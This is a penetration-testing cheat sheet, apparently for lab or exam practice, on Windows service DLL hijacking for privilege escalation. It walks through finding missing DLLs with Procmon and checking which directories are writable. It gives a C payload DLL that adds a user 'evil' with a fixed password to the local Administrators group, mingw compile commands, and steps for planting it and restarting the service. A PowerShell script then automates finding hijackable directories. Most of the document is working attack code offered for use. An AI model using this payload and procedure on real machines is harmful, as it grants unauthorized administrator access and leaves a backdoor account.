DLL/EXE Hijacking

  • Run Procmon as administrator in the RDP session

  • Add filters

    • Result - is - NAME NOT FOUND - Include - click add

    • Path - ends with - .dll - include - click add

    • Apply and OK

  • cmd.exe

    • sc stop dllsvc (or the name of the service you are targeting)

      • or sc.exe stop dllsvc

    • sc start dllsvc

    • OR net stop <servicename>

    • net start <servicename>

  • Procmon now shows every DLL the restarting service tried to load and could not find (NAME NOT FOUND)

  • Check whether the directory of any of those missing .dll paths is writable by your current user (icacls <dir>, or simply try to create a file there). A writable directory that the service searches before finding the real DLL is the hijack point; note also which account the service runs as (sc qc <servicename>), because that is the context your DLL will execute in

  • Now build a .dll with the same name as the missing one from windows_dll.c on Kali. The payload below runs inside the service process when the DLL is loaded and adds a new local user to the Administrators group:

    ```c
    // windows_dll.c
    // For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
    // For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
    #include <windows.h>
    #include <stdlib.h>   // system()

    BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
    {
        if (fdwReason == DLL_PROCESS_ATTACH) {
            // Executes with the privileges of the service account (usually LocalSystem).
            // cmd.exe /c so the spawned shell exits once the command has run.
            system("cmd.exe /c net user evil pass1234 /add");
            system("cmd.exe /c net localgroup administrators evil /add");
            // Kill the host process so the service does not keep running with our DLL loaded.
            ExitProcess(0);
        }
        return TRUE;
    }
    ```

    • x86_64-w64-mingw32-gcc windows_dll.c -shared -o <vuln-dll>.dll (the output name must match the DLL Procmon reported as NAME NOT FOUND; use i686-w64-mingw32-gcc if the service binary is 32-bit, otherwise the load fails)

  • Transfer the .dll to the writable location found in Procmon

  • sc stop dllsvc & sc start dllsvc (or net stop / net start) so the service loads the planted DLL

  • The evil user is now in the local Administrators group; verify with net localgroup administrators
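The steps above are done by eye in the Procmon GUI. The script below is an added example, not part of the original notes, that does the same triage from a Procmon CSV export (File > Save..., CSV): it keeps only NAME NOT FOUND rows ending in .dll, tests whether the current user can actually write to each directory by creating and deleting a probe file (more reliable than reading ACLs, which miss inherited and deny rules), and reports the service's binary directory and run-as account. The CSV path and the service name dllsvc are assumptions; the embedded sample rows are constructed so the script runs offline.

```powershell
# Added example: triage Procmon output for hijackable DLL loads (not from the original notes).
# Assumed path of a Procmon CSV export of the filtered capture.
$csvPath = 'C:\Temp\procmon-dllsvc.csv'

# Constructed sample rows in Procmon's CSV layout, used only when no export exists.
if (-not (Test-Path -LiteralPath $csvPath)) {
    $sample = @'
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","dllhijackservice.exe","1234","CreateFile","C:\Temp\hijackme.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.2","dllhijackservice.exe","1234","CreateFile","C:\Windows\System32\hijackme.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.3","dllhijackservice.exe","1234","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
'@
    $rows = $sample | ConvertFrom-Csv
} else {
    $rows = Import-Csv -LiteralPath $csvPath
}

# Same filter as the Procmon GUI: Result is NAME NOT FOUND and Path ends with .dll
$missing = $rows | Where-Object { $_.Result -eq 'NAME NOT FOUND' -and $_.Path -like '*.dll' }

function Test-DirWritable {
    param([string]$Dir)
    # Try to create and remove a random file; this exercises the effective ACL as the current user.
    if (-not (Test-Path -LiteralPath $Dir -PathType Container)) { return $false }
    $probe = Join-Path $Dir ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, 'x')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

# One line per missing DLL: which process wanted it, where it looked, and whether we can write there.
$missing |
    Select-Object @{n='Process';   e={ $_.'Process Name' }},
                  @{n='MissingDll';e={ $_.Path }},
                  @{n='Directory'; e={ Split-Path $_.Path -Parent }},
                  @{n='Writable';  e={ Test-DirWritable (Split-Path $_.Path -Parent) }} |
    Sort-Object MissingDll -Unique |
    Format-Table -AutoSize

# The service binary's own directory is searched first, so it is the best place to plant the DLL if writable.
# StartName shows the account the service (and therefore the planted DLL) runs as.
$svc = Get-CimInstance Win32_Service -Filter "Name='dllsvc'"
if ($svc) {
    $exe = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] } else { ($svc.PathName -split ' ')[0] }
    $dir = Split-Path $exe -Parent
    '{0} runs {1} as {2}; binary directory writable: {3}' -f $svc.Name, $exe, $svc.StartName, (Test-DirWritable $dir)
}
```

Run it from the same low-privileged RDP session you will plant the DLL from, since writability is evaluated as the current user; a directory that is writable only for an administrator is not a usable hijack point.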
